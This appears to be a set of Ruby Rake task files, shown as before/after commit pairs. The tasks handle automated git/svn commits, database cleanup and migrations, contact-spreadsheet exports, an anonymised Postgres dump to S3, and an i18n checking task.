if(!`git status`.include?('nothing to commit') &&
!`git status`.include?('untracked files present') &&
!`git status`.include?('no changes add to commit'))
if(message.length==0)
if(defined?(REQUIRE_COMMIT_MESSAGE))
Commit.reset_commit_message
raise "commit.message required to perform commit"
else
add_quiet "git commit -m'all'"
end
else
add_quiet "git commit -a -v --file commit.message"
add_quiet "<%Commit.reset_commit_message%>"
end
end
end
if(File.exists?('.svn'))
if(message.length==0)
if(defined?(REQUIRE_COMMIT_MESSAGE))
Commit.reset_commit_message
raise "commit.message required to perform commit"
else
add_quiet 'svn commit -m"commit all"'
end
else
add_quiet 'svn commit --file commit.message'
add_quiet "<%Commit.reset_commit_message%>"
end
end
end
def self.reset_commit_message
File.open('commit.message','w'){|f|f.write('')}
end
end
'all'
puts __FILE__ if defined?(DEBUG)
desc 'commits source files to git or subversion'
if(File.exists?('git'))
task :commit=>[:add] do Tasks.execute_task :commit; end
else
task :commit=>[:add] do Tasks.execute_task :commit;end
end
class Commit < Array
def update
message=""
message=IO.read('commit.message').strip if File.exists?('commit.message')
if(File.exists?('.git') && `git config --list`.include?('user.name=') && Git.user_email.length > 0)
if(!`git status`.include?('nothing to commit') &&
!`git status`.include?('untracked files present') &&
!`git status`.include?('no changes add to commit'))
if(message.length==0)
if(defined?(REQUIRE_COMMIT_MESSAGE))
Commit.reset_commit_message
raise "commit.message required to perform commit"
else
add_passive "git commit -m'all'"
end
else
add_quiet "git commit -a -v --file commit.message"
add_quiet "<%Commit.reset_commit_message%>"
end
end
end
if(File.exists?('.svn'))
if(message.length==0)
if(defined?(REQUIRE_COMMIT_MESSAGE))
Commit.reset_commit_message
raise "commit.message required to perform commit"
else
add_quiet 'svn commit -m"commit all"'
end
else
add_quiet 'svn commit --file commit.message'
add_quiet "<%Commit.reset_commit_message%>"
end
end
end
def self.reset_commit_message
File.open('commit.message','w'){|f|f.write('')}
end
end |
namespace :data do
namespace :cleanup do
desc "delete orphan notifications"
task :notifications do
require 'active_record'
require 'db/connection'
DB::Connection.establish
sql = <<-SQL
DELETE FROM notifications WHERE id IN (
SELECT n.id
FROM notifications n
LEFT JOIN submissions s ON n.item_id=s.id
WHERE n.item_type='Submission'
AND s.id IS NULL
)
SQL
ActiveRecord::Base.connection.execute(sql)
end
end
namespace :migrate do
desc "migrate deprecated problems"
task :deprecated_problems do
require 'bundler'
Bundler.require
require_relative '../exercism'
# in Ruby
{
'point-mutations' => 'hamming'
}.each do |deprecated, replacement|
UserExercise.where(language: 'ruby', slug: deprecated).each do |exercise|
unless UserExercise.where(language: 'ruby', slug: replacement, user_id: exercise.user_id).count > 0
exercise.slug = replacement
exercise.save
exercise.submissions.each do |submission|
submission.slug = replacement
submission.save
end
end
end
end
end
def joined_at
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT id, 'joined', created_at, created_at, created_at
FROM users
SQL
end
def earliest_submission(key)
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT user_id, '#{key}', MIN(created_at), MIN(created_at), MIN(created_at)
FROM submissions s
GROUP BY user_id
SQL
end
def earliest_comment_given
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT c.user_id, 'commented', MIN(c.created_at), MIN(c.created_at), MIN(c.created_at)
FROM comments c
INNER JOIN submissions s
ON c.submission_id=s.id
WHERE s.user_id != c.user_id
GROUP BY c.user_id
SQL
end
def earliest_comment_received
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT s.user_id, 'received_feedback', MIN(c.created_at), MIN(c.created_at), MIN(c.created_at)
FROM comments c
INNER JOIN submissions s
ON c.submission_id=s.id
WHERE s.user_id != c.user_id
GROUP BY s.user_id
SQL
end
def earliest_submission_completed
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT s.user_id, 'completed', MIN(s.done_at), MIN(s.done_at), MIN(s.done_at)
FROM submissions s
WHERE s.done_at IS NOT NULL
GROUP BY s.user_id
SQL
end
desc "migrate lifecycle events"
task :lifecycle do
require 'bundler'
Bundler.require
require_relative '../exercism'
User.connection.execute(joined_at)
# We're missing data for 'fetch'. Inserting submit as placeholder.
User.connection.execute(earliest_submission('fetched'))
User.connection.execute(earliest_submission('submitted'))
User.connection.execute(earliest_comment_received)
User.connection.execute(earliest_comment_given)
User.connection.execute(earliest_submission_completed)
end
end
end
Add cleanup task for orphan comments
namespace :data do
namespace :cleanup do
desc "delete orphan comments"
task :comments do
require 'active_record'
require 'db/connection'
DB::Connection.establish
sql = <<-SQL
DELETE FROM comments WHERE id IN (
SELECT c.id
FROM comments c
LEFT JOIN submissions s ON c.submission_id=s.id
WHERE s.id IS NULL
)
SQL
ActiveRecord::Base.connection.execute(sql)
end
end
namespace :migrate do
desc "migrate deprecated problems"
task :deprecated_problems do
require 'bundler'
Bundler.require
require_relative '../exercism'
# in Ruby
{
'point-mutations' => 'hamming'
}.each do |deprecated, replacement|
UserExercise.where(language: 'ruby', slug: deprecated).each do |exercise|
unless UserExercise.where(language: 'ruby', slug: replacement, user_id: exercise.user_id).count > 0
exercise.slug = replacement
exercise.save
exercise.submissions.each do |submission|
submission.slug = replacement
submission.save
end
end
end
end
end
def joined_at
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT id, 'joined', created_at, created_at, created_at
FROM users
SQL
end
def earliest_submission(key)
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT user_id, '#{key}', MIN(created_at), MIN(created_at), MIN(created_at)
FROM submissions s
GROUP BY user_id
SQL
end
def earliest_comment_given
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT c.user_id, 'commented', MIN(c.created_at), MIN(c.created_at), MIN(c.created_at)
FROM comments c
INNER JOIN submissions s
ON c.submission_id=s.id
WHERE s.user_id != c.user_id
GROUP BY c.user_id
SQL
end
def earliest_comment_received
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT s.user_id, 'received_feedback', MIN(c.created_at), MIN(c.created_at), MIN(c.created_at)
FROM comments c
INNER JOIN submissions s
ON c.submission_id=s.id
WHERE s.user_id != c.user_id
GROUP BY s.user_id
SQL
end
def earliest_submission_completed
<<-SQL
INSERT INTO lifecycle_events
(user_id, key, happened_at, created_at, updated_at)
SELECT s.user_id, 'completed', MIN(s.done_at), MIN(s.done_at), MIN(s.done_at)
FROM submissions s
WHERE s.done_at IS NOT NULL
GROUP BY s.user_id
SQL
end
desc "migrate lifecycle events"
task :lifecycle do
require 'bundler'
Bundler.require
require_relative '../exercism'
User.connection.execute(joined_at)
# We're missing data for 'fetch'. Inserting submit as placeholder.
User.connection.execute(earliest_submission('fetched'))
User.connection.execute(earliest_submission('submitted'))
User.connection.execute(earliest_comment_received)
User.connection.execute(earliest_comment_given)
User.connection.execute(earliest_submission_completed)
end
end
end
|
require File.dirname(__FILE__) + '/data_loader'
require "#{RAILS_ROOT}/app/helpers/application_helper"
namespace :data do
include DataLoader
desc "Create a spreadsheet of organizations' contact information"
task :create_organization_contact_spreadsheet => :environment do
include ActionController::UrlWriter
ActionController.default_url_options[:host] = MySociety::Config.get("DOMAIN", 'localhost:3000')
check_for_dir
puts "Writing PTE contact spreadsheet to #{ENV['DIR']}..."
File.open(File.join(ENV['DIR'], 'ptes.tsv'), 'w') do |pte_file|
pte_file.write("Passenger Transport Executive\tWikipedia URL\tContact category\tContact location type\tContact email\tNotes\n")
PassengerTransportExecutive.find_each do |pte|
if pte.pte_contacts.empty?
pte_file.write([pte.name,
pte.wikipedia_url,
'',
'',
'',
''].join("\t") + "\n")
else
pte.pte_contacts.each do |pte_contact|
pte_file.write([pte.name,
pte.wikipedia_url,
pte_contact.category,
pte_contact.location_type,
pte_contact.email,
pte_contact.notes].join("\t") + "\n")
end
end
end
end
puts "Writing council contact spreadsheet to #{ENV['DIR']}..."
File.open(File.join(ENV['DIR'], 'council_contacts.tsv'), 'w') do |council_contacts_file|
council_contacts_file.write("Council\tArea ID\tContact category\tContact district ID\tContact email\tNotes\n")
Council.find_all_without_ptes().each do |council|
council.contacts.each do |council_contact|
council_contacts_file.write([council.name,
council.id,
council_contact.category,
council_contact.district_id,
council_contact.email,
council_contact.notes].join("\t") + "\n")
end
end
end
puts "Writing operator contact spreadsheet to #{ENV['DIR']}..."
File.open(File.join(ENV['DIR'], 'operator_contacts.tsv'), 'w') do |operator_contact_file|
operator_contact_file.write("ID\tOperator\tCompany no\tRegistered address\tCompany URL\tContact category\tContact location\tContact email\tNotes\tRoute count\tURL - has list of routes\n")
Operator.find(:all, :order => 'name').each do |operator|
if operator.routes.count > 0
if operator.operator_contacts.empty?
operator_contact_file.write([operator.id,
operator.name,
operator.company_no,
operator.registered_address,
operator.url,
'',
'',
'',
'',
operator.routes.count,
operator_url(operator)].join("\t") + "\n")
else
operator.operator_contacts.each do |operator_contact|
if operator_contact.location
location_desc = operator_contact.location.description
else
location_desc = ''
end
operator_contact_file.write([operator.id,
operator.name,
operator.company_no,
operator.registered_address,
operator.url,
operator_contact.category,
location_desc,
operator_contact.email,
operator_contact.notes,
operator.routes.count,
operator_url(operator)].join("\t") + "\n")
end
end
end
end
end
end
end
Task for dumping a spreadsheet of praise comments.
require File.dirname(__FILE__) + '/data_loader'
require "#{RAILS_ROOT}/app/helpers/application_helper"
namespace :data do
include DataLoader
desc "Create a spreadsheet of praise reports"
task :create_praise_spreadsheet => :environment do
include ActionController::UrlWriter
ActionController.default_url_options[:host] = MySociety::Config.get("DOMAIN", 'localhost:3000')
include ApplicationHelper
check_for_dir
puts "Writing praise spreadsheet to #{ENV['DIR']}..."
File.open(File.join(ENV['DIR'], 'praise.tsv'), 'w') do |praise_file|
headers = ['URL', 'Date', 'Text', 'User']
praise_file.write(headers.join("\t") + "\n")
# Any comment attached to a location is praise
locations = ['Stop', 'StopArea', 'Route', 'SubRoute']
Comment.find_each(:conditions => ['commented_type in (?)', locations]) do |comment|
praise_file.write([commented_url(comment.commented),
comment.confirmed_at.to_s,
comment.text,
comment.user_name].join("\t") + "\n")
end
end
end
desc "Create a spreadsheet of organizations' contact information"
task :create_organization_contact_spreadsheet => :environment do
include ActionController::UrlWriter
ActionController.default_url_options[:host] = MySociety::Config.get("DOMAIN", 'localhost:3000')
check_for_dir
puts "Writing PTE contact spreadsheet to #{ENV['DIR']}..."
File.open(File.join(ENV['DIR'], 'ptes.tsv'), 'w') do |pte_file|
pte_file.write("Passenger Transport Executive\tWikipedia URL\tContact category\tContact location type\tContact email\tNotes\n")
PassengerTransportExecutive.find_each do |pte|
if pte.pte_contacts.empty?
pte_file.write([pte.name,
pte.wikipedia_url,
'',
'',
'',
''].join("\t") + "\n")
else
pte.pte_contacts.each do |pte_contact|
pte_file.write([pte.name,
pte.wikipedia_url,
pte_contact.category,
pte_contact.location_type,
pte_contact.email,
pte_contact.notes].join("\t") + "\n")
end
end
end
end
puts "Writing council contact spreadsheet to #{ENV['DIR']}..."
File.open(File.join(ENV['DIR'], 'council_contacts.tsv'), 'w') do |council_contacts_file|
council_contacts_file.write("Council\tArea ID\tContact category\tContact district ID\tContact email\tNotes\n")
Council.find_all_without_ptes().each do |council|
council.contacts.each do |council_contact|
council_contacts_file.write([council.name,
council.id,
council_contact.category,
council_contact.district_id,
council_contact.email,
council_contact.notes].join("\t") + "\n")
end
end
end
puts "Writing operator contact spreadsheet to #{ENV['DIR']}..."
File.open(File.join(ENV['DIR'], 'operator_contacts.tsv'), 'w') do |operator_contact_file|
operator_contact_file.write("ID\tOperator\tCompany no\tRegistered address\tCompany URL\tContact category\tContact location\tContact email\tNotes\tRoute count\tURL - has list of routes\n")
Operator.find(:all, :order => 'name').each do |operator|
if operator.routes.count > 0
if operator.operator_contacts.empty?
operator_contact_file.write([operator.id,
operator.name,
operator.company_no,
operator.registered_address,
operator.url,
'',
'',
'',
'',
operator.routes.count,
operator_url(operator)].join("\t") + "\n")
else
operator.operator_contacts.each do |operator_contact|
if operator_contact.location
location_desc = operator_contact.location.description
else
location_desc = ''
end
operator_contact_file.write([operator.id,
operator.name,
operator.company_no,
operator.registered_address,
operator.url,
operator_contact.category,
location_desc,
operator_contact.email,
operator_contact.notes,
operator.routes.count,
operator_url(operator)].join("\t") + "\n")
end
end
end
end
end
end
end |
require_relative 'rake_helpers/dump_file_writer'
require_relative 'rake_helpers/s3_bucket'
require_relative 'rake_helpers/rake_utils'
require 'fileutils'
require 'open3'
include RakeUtils
namespace :db do
namespace :dump do
desc <<~ldesc
Run dump file job from local machine
* requires kubectl and access to git-crypted secrets
Usage:
# runs dump job against staging using latest master branch build
rake db:dump:run_job['staging']
# # runs dump job against dev using my-branch-latest build
rake db:dump:run_job['dev','my-branch-latest']
ldesc
task :run_job, [:host, :build_tag] => :environment do |_task, args|
host = args.host
build_tag = args.build_tag || 'latest'
raise ArgumentError.new('invalid host') unless valid_hosts.include?(host)
script = Rails.root.join('kubernetes_deploy', 'scripts', 'job.sh')
cmd = "#{script} dump #{host} #{build_tag}"
Open3.popen2e(cmd) do |stdin, stdout_and_stderr, wait_thr|
stdout_and_stderr.each_line do |line|
puts line
end
raise ['Failure'.red, ': ', cmd].join unless wait_thr.value.success?
end
continue?'Do you want to delete all but the latest dump file from s3?'
Rake::Task['db:dump:delete_s3_dumps'].invoke(host)
end
desc 'Create anonymised database dump, compress (gzip) and upload to s3 - run on host via job (see run_job)'
task :anonymised => :environment do
cmd = 'pg_dump --version'
puts '---------------------------'
print "Using: #{%x(#{cmd})}".yellow
host = Rails.host.env
puts "Host environment: #{host || 'not set'}"
filename = File.join('tmp', "#{Time.now.strftime('%Y%m%d%H%M%S')}_dump.psql")
shell_working "exporting unanonymised database data to #{filename}..." do
cmd = "pg_dump $DATABASE_URL --no-owner --no-privileges --no-password #{sensitive_table_exclusions} -f #{filename}"
system(cmd)
end
# $arel_silence_type_casting_deprecation = true
excluded_tables.each do |table|
task_name = "db:dump:#{table}"
Rake::Task[task_name].invoke(filename)
end
# $arel_silence_type_casting_deprecation = false
compressed_file = compress_file(filename)
shell_working "writing dump file #{filename}.gz to #{host}'s s3 bucket..." do
s3_bucket = S3Bucket.new(host)
s3_bucket.put_object(compressed_file, File.read(compressed_file))
end
Rake::Task['db:dump:list_s3_dumps'].invoke(Rails.host.env)
end
desc 'List s3 database dump files'
task :list_s3_dumps, [:host] => :environment do |_task, args|
require 'action_view'
include ActionView::Helpers::NumberHelper
host = args.host
raise ArgumentError.new("invalid host #{host}") unless valid_hosts.include?(host)
s3_bucket = S3Bucket.new(host)
dump_files = s3_bucket.list('tmp').select { |item| item.key.match?('dump') }
abort('No dump files found!'.yellow) if dump_files.empty?
puts "------------list of dump files on #{host}----------------"
dump_files.sort_by(&:last_modified).reverse.map do |object|
puts "Key: #{object.key}"
puts "Last modified: #{object.last_modified.iso8601}"
puts "Size: #{number_to_human_size(object.content_length)}"
puts '-----------------------------------------------------'
end
end
desc 'Delete all but latest s3 database dump files'
task :delete_s3_dumps, [:host, :all] => :environment do |_task, args|
host = args.host
start = args.all.eql?('all') ? 0 : 1
raise ArgumentError.new("invalid host #{host}") unless valid_hosts.include?(host)
s3_bucket = S3Bucket.new(host)
dump_files = s3_bucket.list('tmp').select { |item| item.key.match?('dump') }
dump_files.sort_by(&:last_modified).reverse[start..].map do |object|
print "Deleting #{object.key}..."
object.delete
puts 'done'.green
end
end
desc 'Copy s3 bucket dump file locally and decompress'
task :copy_s3_dump, [:key, :host] => :environment do |_task, args|
dump_file, host = args.key, args.host
raise ArgumentError.new('invalid host') unless valid_hosts.include?(host)
# stream object directly
# https://aws.amazon.com/blogs/developer/downloading-objects-from-amazon-s3-using-the-aws-sdk-for-ruby/
dirname = Rails.root.join('tmp', "#{host}")
FileUtils.mkpath(dirname)
local_filename = dirname.join(dump_file.split(File::Separator).last)
s3_bucket = S3Bucket.new(host)
shell_working "Copying S3 file #{dump_file} to local file #{local_filename} data" do
File.open(local_filename, 'wb') do |file|
reap = s3_bucket.get_object(dump_file, target: file)
end
end
decompress_file(local_filename)
end
desc 'Export anonymised providers data'
task :providers, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Provider.find_each(batch_size: batch_size) do |provider|
provider.name = [Faker::Company.name, provider.id].join(' ')
writer.call(provider)
end
end
end
end
desc 'Export anonymised defendants data'
task :defendants, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Defendant.find_each(batch_size: batch_size) do |defendant|
defendant.first_name = Faker::Name.first_name
defendant.last_name = Faker::Name.last_name
writer.call(defendant)
end
end
end
end
desc 'Export anonymised users data'
task :users, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
whitelist_domains = %w(example.com agfslgfs.com)
write_to_file(args.file) do |writer|
User.find_each(batch_size: batch_size) do |user|
user.encrypted_password = '$2a$10$r4CicQylcCuq34E1fysqEuRlWRN4tiTPUOHwksecXT.hbkukPN5F2'
unless whitelist_domains.detect { |domain| user.email.end_with?(domain) }
user.first_name = Faker::Name.first_name
user.last_name = Faker::Name.last_name
user.email = "#{user.id}@anonymous.com"
end
writer.call(user)
end
end
end
end
desc 'Export anonymised messages data'
task :messages, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Message.find_each(batch_size: batch_size) do |message|
message.body = Faker::Lorem.sentence(word_count: 6, supplemental: false, random_words_to_add: 10)
if message.attachment_file_name.present?
message.attachment_file_name = fake_file_name(message.attachment_file_name)
end
writer.call(message)
end
end
end
end
desc 'Export anonymised document data'
task :documents, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Document.find_each(batch_size: batch_size) do |document|
with_file_name(fake_file_name(document.document_file_name)) do |file_name, ext|
document.document_file_name = "#{file_name}.#{ext}"
document.converted_preview_document_file_name = "#{file_name}#{ '.' + ext unless ext == 'pdf' }.pdf"
document.file_path = "/s3/path/to/#{file_name}.#{ext}"
end
writer.call(document)
end
end
end
end
desc 'Export anonymised claims data'
task :claims, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Claim::BaseClaim.find_each(batch_size: batch_size) do |claim|
claim.travel_expense_additional_information = fake_paragraphs if claim.travel_expense_additional_information.present?
claim.additional_information = fake_paragraphs if claim.additional_information.present?
claim.providers_ref = claim.providers_ref.tr('a-zA-Z', translation) if claim.providers_ref.present?
writer.call(claim)
end
end
end
end
private
def valid_hosts
%w[dev dev-lgfs staging api-sandbox production]
end
def excluded_tables
%w(providers users claims defendants messages documents)
end
def sensitive_table_exclusions
# make sure a db:dump task exists for each of the excluded tables (i.e. db:dump:providers)
excluded_tables.map { |table| "--exclude-table-data #{table}" }.join(' ')
end
def fake_file_name original_file_name
*file_parts, _last = Faker::File.file_name.gsub(/\//,'_').split('.')
file_parts.join + '.' + original_file_name.split('.').last
end
def with_file_name file_name, &block
*file_name, ext = file_name.split('.')
yield file_name.join, ext if block_given?
end
def fake_paragraphs max_paragraph_count=4
Faker::Lorem.paragraphs(number: max_paragraph_count).pop(rand(1..max_paragraph_count)).join("\n")
end
def translation
[('a'..'z'), ('A'..'Z')].map(&:to_a).map(&:shuffle).join
end
def write_to_file(name)
writer = DumpFileWriter.new(name)
yield -> (model) do
writer.model = model
writer.write
end
end
# optimum determined from benchmarking
def batch_size
@batch_size ||= 200
end
end
end
Anonymise entire filename
Previously the extension (text after last dot)
was not anonymised. Hwoever, some files with extremely
long names are being uploaded and the names truncated.
this can result in an unanomised part of the file name.
This solution renames the file and relies on the
mime content_type to then reattach the correct
extension.
require_relative 'rake_helpers/dump_file_writer'
require_relative 'rake_helpers/s3_bucket'
require_relative 'rake_helpers/rake_utils'
require 'fileutils'
require 'open3'
include RakeUtils
namespace :db do
namespace :dump do
desc <<~ldesc
Run dump file job from local machine
* requires kubectl and access to git-crypted secrets
Usage:
# runs dump job against staging using latest master branch build
rake db:dump:run_job['staging']
# # runs dump job against dev using my-branch-latest build
rake db:dump:run_job['dev','my-branch-latest']
ldesc
task :run_job, [:host, :build_tag] => :environment do |_task, args|
host = args.host
build_tag = args.build_tag || 'latest'
raise ArgumentError.new('invalid host') unless valid_hosts.include?(host)
script = Rails.root.join('kubernetes_deploy', 'scripts', 'job.sh')
cmd = "#{script} dump #{host} #{build_tag}"
Open3.popen2e(cmd) do |stdin, stdout_and_stderr, wait_thr|
stdout_and_stderr.each_line do |line|
puts line
end
raise ['Failure'.red, ': ', cmd].join unless wait_thr.value.success?
end
continue?'Do you want to delete all but the latest dump file from s3?'
Rake::Task['db:dump:delete_s3_dumps'].invoke(host)
end
desc 'Create anonymised database dump, compress (gzip) and upload to s3 - run on host via job (see run_job)'
task :anonymised => :environment do
cmd = 'pg_dump --version'
puts '---------------------------'
print "Using: #{%x(#{cmd})}".yellow
host = Rails.host.env
puts "Host environment: #{host || 'not set'}"
filename = File.join('tmp', "#{Time.now.strftime('%Y%m%d%H%M%S')}_dump.psql")
shell_working "exporting unanonymised database data to #{filename}..." do
cmd = "pg_dump $DATABASE_URL --no-owner --no-privileges --no-password #{sensitive_table_exclusions} -f #{filename}"
system(cmd)
end
# $arel_silence_type_casting_deprecation = true
excluded_tables.each do |table|
task_name = "db:dump:#{table}"
Rake::Task[task_name].invoke(filename)
end
# $arel_silence_type_casting_deprecation = false
compressed_file = compress_file(filename)
shell_working "writing dump file #{filename}.gz to #{host}'s s3 bucket..." do
s3_bucket = S3Bucket.new(host)
s3_bucket.put_object(compressed_file, File.read(compressed_file))
end
Rake::Task['db:dump:list_s3_dumps'].invoke(Rails.host.env)
end
desc 'List s3 database dump files'
task :list_s3_dumps, [:host] => :environment do |_task, args|
require 'action_view'
include ActionView::Helpers::NumberHelper
host = args.host
raise ArgumentError.new("invalid host #{host}") unless valid_hosts.include?(host)
s3_bucket = S3Bucket.new(host)
dump_files = s3_bucket.list('tmp').select { |item| item.key.match?('dump') }
abort('No dump files found!'.yellow) if dump_files.empty?
puts "------------list of dump files on #{host}----------------"
dump_files.sort_by(&:last_modified).reverse.map do |object|
puts "Key: #{object.key}"
puts "Last modified: #{object.last_modified.iso8601}"
puts "Size: #{number_to_human_size(object.content_length)}"
puts '-----------------------------------------------------'
end
end
desc 'Delete all but latest s3 database dump files'
task :delete_s3_dumps, [:host, :all] => :environment do |_task, args|
host = args.host
start = args.all.eql?('all') ? 0 : 1
raise ArgumentError.new("invalid host #{host}") unless valid_hosts.include?(host)
s3_bucket = S3Bucket.new(host)
dump_files = s3_bucket.list('tmp').select { |item| item.key.match?('dump') }
dump_files.sort_by(&:last_modified).reverse[start..].map do |object|
print "Deleting #{object.key}..."
object.delete
puts 'done'.green
end
end
desc 'Copy s3 bucket dump file locally and decompress'
task :copy_s3_dump, [:key, :host] => :environment do |_task, args|
dump_file, host = args.key, args.host
raise ArgumentError.new('invalid host') unless valid_hosts.include?(host)
# stream object directly
# https://aws.amazon.com/blogs/developer/downloading-objects-from-amazon-s3-using-the-aws-sdk-for-ruby/
dirname = Rails.root.join('tmp', "#{host}")
FileUtils.mkpath(dirname)
local_filename = dirname.join(dump_file.split(File::Separator).last)
s3_bucket = S3Bucket.new(host)
shell_working "Copying S3 file #{dump_file} to local file #{local_filename} data" do
File.open(local_filename, 'wb') do |file|
reap = s3_bucket.get_object(dump_file, target: file)
end
end
decompress_file(local_filename)
end
desc 'Export anonymised providers data'
task :providers, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Provider.find_each(batch_size: batch_size) do |provider|
provider.name = [Faker::Company.name, provider.id].join(' ')
writer.call(provider)
end
end
end
end
desc 'Export anonymised defendants data'
task :defendants, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Defendant.find_each(batch_size: batch_size) do |defendant|
defendant.first_name = Faker::Name.first_name
defendant.last_name = Faker::Name.last_name
writer.call(defendant)
end
end
end
end
desc 'Export anonymised users data'
task :users, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
whitelist_domains = %w(example.com agfslgfs.com)
write_to_file(args.file) do |writer|
User.find_each(batch_size: batch_size) do |user|
user.encrypted_password = '$2a$10$r4CicQylcCuq34E1fysqEuRlWRN4tiTPUOHwksecXT.hbkukPN5F2'
unless whitelist_domains.detect { |domain| user.email.end_with?(domain) }
user.first_name = Faker::Name.first_name
user.last_name = Faker::Name.last_name
user.email = "#{user.id}@anonymous.com"
end
writer.call(user)
end
end
end
end
desc 'Export anonymised messages data'
task :messages, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Message.find_each(batch_size: batch_size) do |message|
message.body = Faker::Lorem.sentence(word_count: 6, supplemental: false, random_words_to_add: 10)
if message.attachment_file_name.present?
message.attachment_file_name = fake_file_name(content_type: message.attachment_content_type)
end
writer.call(message)
end
end
end
end
desc 'Export anonymised document data'
task :documents, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Document.find_each(batch_size: batch_size) do |document|
with_file_name(fake_file_name(content_type: document.document_content_type)) do |file_name, ext|
document.document_file_name = "#{file_name}.#{ext}"
document.converted_preview_document_file_name = "#{file_name}#{ '.' + ext unless ext == 'pdf' }.pdf"
document.file_path = "/s3/path/to/#{file_name}.#{ext}"
end
writer.call(document)
end
end
end
end
desc 'Export anonymised claims data'
task :claims, [:file] => :environment do |task, args|
shell_working "exporting anonymised #{task.name.split(':').last} data" do
write_to_file(args.file) do |writer|
Claim::BaseClaim.find_each(batch_size: batch_size) do |claim|
claim.travel_expense_additional_information = fake_paragraphs if claim.travel_expense_additional_information.present?
claim.additional_information = fake_paragraphs if claim.additional_information.present?
claim.providers_ref = claim.providers_ref.tr('a-zA-Z', translation) if claim.providers_ref.present?
writer.call(claim)
end
end
end
end
private
def valid_hosts
%w[dev dev-lgfs staging api-sandbox production]
end
def excluded_tables
%w(providers users claims defendants messages documents)
end
def sensitive_table_exclusions
# make sure a db:dump task exists for each of the excluded tables (i.e. db:dump:providers)
excluded_tables.map { |table| "--exclude-table-data #{table}" }.join(' ')
end
def fake_file_name(content_type:)
Faker::File.file_name(dir: 'fake_file_name', ext: MIME::Types[content_type].first.extensions.first).tr('/','_')
end
def with_file_name file_name, &block
*file_name, ext = file_name.split('.')
yield file_name.join, ext if block_given?
end
def fake_paragraphs max_paragraph_count=4
Faker::Lorem.paragraphs(number: max_paragraph_count).pop(rand(1..max_paragraph_count)).join("\n")
end
def translation
[('a'..'z'), ('A'..'Z')].map(&:to_a).map(&:shuffle).join
end
def write_to_file(name)
writer = DumpFileWriter.new(name)
yield -> (model) do
writer.model = model
writer.write
end
end
# optimum determined from benchmarking
def batch_size
@batch_size ||= 200
end
end
end
|
namespace :i18n do
module HashExtensions
def flatten_keys(result={}, prefix='')
each_pair do |k, v|
if v.is_a?(Hash)
v.flatten_keys(result, "#{prefix}#{k}.")
else
result["#{prefix}#{k}"] = v
end
end
result
end
def expand_keys(result = {})
each_pair do |k, v|
parts = k.split('.')
last = parts.pop
parts.inject(result){ |h, k2| h[k2] ||= {}}[last] = v
end
result
end
def to_ordered
keys.sort_by(&:to_s).inject ActiveSupport::OrderedHash.new do |h, k|
v = fetch(k)
h[k] = v.is_a?(Hash) ? v.to_ordered : v
h
end
end
end
def infer_scope(filename)
case filename
when /app\/views\/.*\.handlebars\z/
filename.gsub(/.*app\/views\/jst\/_?|\.handlebars\z/, '').underscore.gsub(/\/_?/, '.')
when /app\/controllers\//
scope = filename.gsub(/.*app\/controllers\/|controller.rb/, '').gsub(/\/_?|_\z/, '.')
scope == 'application.' ? '' : scope
when /app\/messages\//
filename.gsub(/.*app\/|erb/, '').gsub(/\/_?/, '.')
when /app\/models\//
scope = filename.gsub(/.*app\/models\/|rb/, '')
STI_SUPERCLASSES.include?(scope) ? '' : scope
when /app\/views\//
filename.gsub(/.*app\/views\/|(html\.|fbml\.)?erb\z/, '').gsub(/\/_?/, '.')
else
''
end
end
desc "Verifies all translation calls"
task :check => :environment do
Bundler.require :i18n_tools
only = if ENV['ONLY']
ENV['ONLY'].split(',').map{ |path|
path = '**/' + path if path =~ /\*/
path = './' + path unless path =~ /\A.?\//
if path =~ /\*/
path = Dir.glob(path)
elsif path !~ /\.(e?rb|js)\z/
path = Dir.glob(path + '/**/*')
end
path
}.flatten
end
STI_SUPERCLASSES = (`grep '^class.*<' ./app/models/*rb|grep -v '::'|sed 's~.*< ~~'|sort|uniq`.split("\n") - ['OpenStruct', 'Tableless']).
map{ |name| name.underscore + '.' }
COLOR_ENABLED = ($stdout.tty? rescue false)
def color(text, color_code)
COLOR_ENABLED ? "#{color_code}#{text}\e[0m" : text
end
def green(text)
color(text, "\e[32m")
end
def red(text)
color(text, "\e[31m")
end
@errors = []
def process_files(files)
files.each do |file|
begin
print green "." if yield file
rescue SyntaxError, StandardError
@errors << "#{$!}\n#{file}"
print red "F"
end
end
end
t = Time.now
I18n.available_locales
stringifier = proc { |hash, (key, value)|
hash[key.to_s] = value.is_a?(Hash) ?
value.inject({}, &stringifier) :
value
hash
}
@translations = I18n.backend.send(:translations)[:en].inject({}, &stringifier)
# Ruby
